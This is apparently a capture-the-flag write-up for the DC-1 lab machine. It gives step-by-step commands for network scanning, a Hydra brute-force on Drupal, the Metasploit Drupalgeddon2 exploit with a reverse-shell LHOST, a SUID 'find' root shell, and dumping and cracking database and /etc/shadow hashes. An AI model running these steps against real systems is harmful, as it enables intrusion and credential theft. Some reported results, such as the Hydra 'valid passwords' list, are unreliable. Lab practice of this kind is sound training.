DC-1 Challenge WriteUp

The DC-1 challenge is designed to help you practice the skills needed to find weaknesses in a network, take advantage of those weaknesses, and eventually gain full control over a target machine. In this write-up, I will guide you step by step through the process, explaining everything in simple terms.

Using tools like Nmap to scan the network, Hydra to guess passwords, and Metasploit to exploit known security flaws. By following these steps, will learn how to successfully break into a machine running Drupal, a content management system, and eventually gain administrative access.

Objective:

The goal of this challenge is to identify the vulnerabilities in the DC-1 machine, exploit them, and eventually gain root access.

Gaining Initial Access

Switching to the Root User: First, you need to become the root user (the highest privilege user) on your ATTACKER machine (Kali Linux). This is important because some commands require high-level permissions.

sudo su

Finding ATTACKER IP: Need to find the IP address of the ATTACKER machine (Kali Linux). This is important because will need it later to connect back to ATTACKER machine.

ip a

Scanning the Network: Now, will scan the network to find other devices, like the TARGET machine (DC-1). This helps to understand what devices are active and what services they are running.

Scanning the network with the appropriate IP range

netdiscover -r <NATWORK IP>/CDR

Simple Ping Scan: This checks which devices are online without probing them deeply.

A quick scan across the entire network to show all the active devices without probing open ports. To identify the IP address of the DC-1 machine.

nmap -sn <NATWORK IP>/CDR

Detailed Network Scan: This scan will give detailed information about all devices on the network, including the services that are running and open PORT NUMBERS.

Scanning all the IPs in the specified range at once allows for gathering detailed information on all active devices in one go.

nmap -Pn -sSV -A -p- <NATWORK IP>/CDR

-Pn: Disables host discovery, treats all hosts as online .

-sSV: Performs service detection and version detection.

-A: Enables OS detection, version detection, script scanning, and traceroute.

-p-: Scans all 65535 ports.

Summary of Each IP:

— 192.168.19.1

Running Windows with various services like MSRPC, NetBIOS, and possibly AnyDesk.

— 192.168.19.15

Running Linux with OpenSSH and Apache on port 80 (Drupal site).

This looks like DC-1, it has SSH open and an HTTP service running.

— 192.168.19.20

All ports are filtered; it’s hard to gather details, but it could be a firewalled machine.

— 192.168.19.138

Only port 53 is open, and it’s tcpwrapped, indicating some kind of DNS service.

— 192.168.19.12

All ports are filtered, with no additional information.

This is the Kali machine

Since the192.168.19.15 machine has SSH (port 22) and HTTP (port 80) running, focussing on these services first:

Drupal (HTTP Service on Port 80):

Exploiting the Drupal Site (192.168.19.15)

After identifying the TARGET machine (192.168.19.15) as running a Drupal site, now can start trying to exploit it.

Accessing the Drupal Site: Entering the TARGET IP in the web browser.

http://< TARGET IP >

Checking for Exposed Sensitive Default Files

http:// < TARGET IP >/CHANGELOG.txt

http:// < TARGET IP >//INSTALL.txt

http:// < TARGET IP >//README.txt

Trying to Access the Admin Page

http://< TARGET IP >/admin

tried to access the admin page directly, it redirected back to the Drupal login page. This shows that admin access is protected.

Brute Force Attack Using Hydra: To break into the Drupal admin account, need to use Hydra to try many passwords quickly.

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.19.15 http-post-form "/?q=user/login:username=^USER^&password=^PASS^:Invalid username or password."

This command tries all passwords in the rockyou.txt wordlist and assumes that an Invalid username or password is the string displayed when a login attempt fails.

Hydra successfully found multiple valid passwords for the admin user.

The passwords that were identified:

123456

12345678

123456789

rockyou

iloveyou

princess

nicole

password

jessica

abc123

daniel

babygirl

monkey

lovely

Login into the Drupal site as the admin user by using one of the discovered passwords

Since the account is locked, exploring other attack vectors on the site.

Searching for available exploits related to Drupal using Exploit Database (exploit-db) a public exploits and vulnerability information platform.

https://www.exploit-db.com/

Post-Exploitation with Metasploit

Exploit a Vulnerability using Metasploit Framework

Metasploit is a powerful and widely-used penetration testing framework that provides security professionals, ethical hackers, and researchers with tools to discover, exploit, and validate vulnerabilities in systems.

Starting Metasploit console

The command-line interface (CLI) of Metasploit, called msfconsole, is the most commonly used interface. It allows users to configure and run exploits, payloads, and auxiliary modules interactively.

msfconsole -q

Searching for Drupal Exploits: Look for exploits related to the Drupal site using its vulnerability code (CVE).

search cve:2019–6340

Using Exploit Modules: Selecting and using the exploit that targets Drupal’s vulnerability.

use exploit/unix/webapp/drupal_restws_unserialize

Show options for the module

show options

Required Options:

RHOSTS:

This is the TARGET IP address (the Drupal server).

set RHOSTS < TARGET IP >

LHOST

The local IP address to the ATTACKER IP machine receives the reverse shell. ATTACKER

set LHOST <ATTACKER IP>

Verifying that all needed options are set

show options

Running the Exploit

run

Setting ForceExploit Option:

Setting ForceExploit to true and run again

set ForceExploit true
run

Result: Wasn’t successful.

Searching for a different exploit

search drupal

Selecting the Exploit Module

use exploit/unix/webapp/drupal_drupalgeddon2

RHOSTS

set RHOSTS <TARGET IP>

Verifying that all needed options are set and run the exploited

show options

Running the Exploit

run

Result: Was successful, now there is a Meterpreter session, which means that there is control over the TARGET machine.

Interacting with the Session

sessions -i 1

Gathering System Information

sysinfo

Checking Current User Privileges

getuid

Escalating Privileges: To get full control, need to escalate privileges. Convert the Meterpreter session to a more stable shell:

Converting the Meterpreter Session to Shell

shell

Improving the Shell

python -c 'import pty;pty.spawn("/bin/bash")'

Listing files and directories

ls

Checking Flag Files

cat flag1.txt

Listing the Directories

ls -d */

Navigating to the site Directory

cd sites

Listing the Directories

ls -d */

Navigating into the sites Directory

cd sites/
ls -la

Navigating into the default Directory

cd default
ls

Viewing the Contents of settings.php

cat settings.php

Key Information in settings.php:

Database Credentials:

Database Name: drupaldb

Username: dbuser

Password: R0ck3t

Host: localhost

Drupal Hash Salt: This is a unique string used for securing one-time login links and form tokens.

Searching for SUID Binaries: SUID (Set Owner User ID) Binaries can sometimes be exploited to gain

find / -perm -4000 -type f 2>/dev/null

This command is used in Linux to find all files on the system that have the SUID (Set User ID) permission set.

find /: This starts the search at the root directory (/) and searches through all directories and subdirectories.

-perm -4000: The -perm option is used to search for files with specific permissions. The -4000 argument tells find to look for files with the SUID bit set. The SUID bit allows a file to be executed with the permissions of the file’s owner rather than the permissions of the user who runs it.

-type f: This restricts the search to only files (-type f) and excludes directories, links, and other types of filesystem objects.

2>/dev/null: This redirects any error messages (e.g., permission denied errors) to /dev/null, effectively silencing them. This is useful when searching through directories where you might not have read permissions.

Using GTFOBins to search a sudo a venerability using find commend

GTFOBins (Get The F*ck Out Binaries) is a curated list of Unix binaries that can be exploited by an attacker to escalate privileges, bypass local security restrictions, or break out of restricted environments like containers and chrooted systems.

https://gtfobins.github.io/

Using the find Command to Execute a Shell for the First Found File

find . -exec /bin/sh \; -quit

whoami
id

Logging Into MySQL

MySQL is a widely-used, open-source relational database management system (RDBMS) that uses Structured Query Language (SQL) for accessing, managing, and manipulating databases. MySQL is known for its speed, reliability, and ease of use, making it a popular choice for web applications, data warehousing, and enterprise-level projects.

mysql -u dbuser -p

USE drupaldb;

Selecting Drupal Database

Listed Tables in the Database

SHOW TABLES;

Checking the Users Table

DESCRIBE users;

Retrieving Data from the Users Table

SELECT uid, name, pass, mail FROM users;

Cracking Passwords

Saving the Hash to a File

echo '<HASH>' admin_hash.txt

Cracking using John the Ripper

john - wordlist=/usr/share/wordlists/rockyou.txt admin_hash.txt

John the Ripper tool compares the hash against a list of possible passwords.

The password-cracking process using John the Ripper was successful. The password that was cracked is 53cr3t.

Logging into the Drupal Admin Interface

Username: admin
Password: 53cr3t

Accessing the /etc/shadow file to see the encrypted passwords of all users on the system

cat /etc/shadow

In a New Terminal in Kali Linux machine Creating a File with the Root Hash

echo '<HASH>' root_hash.txt

Running John the Ripper

john - wordlist=/usr/share/wordlists/rockyou.txt root_hash.t

The session ended without any result; John the Ripper was unable to crack the password.

Using Hashcat to Crack the Password

hashcat -m 1800 -a 0 root_hash.txt /usr/share/wordlists/rockyou.txt

-m 1800: Specifies the hash type, which is SHA-512 (crypt).

-a 0: Specifies the attack mode, which is a straight dictionary attack.

root_hash.txt: The file containing the hash you want to crack.

/usr/share/wordlists/rockyou.txt: The wordlist used for the dictionary attack.

hash wasn’t cracked

Background of the Meterpreter Session

background

In the Metasploit console, load the exploit suggester module to gain higher privileges

use post/multi/recon/local_exploit_suggester

List of active sessions

sessions

Set the Session ID

set SESSION 1

Running the Exploit

run

No exploits for the current environment were found

Navigating to the root File System and Listing the Contents

Reading the contents of thefinalflag.txt

cd /root
ls
cat cat thefinalflag.txt

Completing this challenge not only reinforces technical skills but also enhances problem-solving abilities and strategic thinking. A challenge like DC-1 will help become more proficient in identifying and addressing security threats in real-world scenarios, leading to continuous professional growth in the fascinating world of cybersecurity.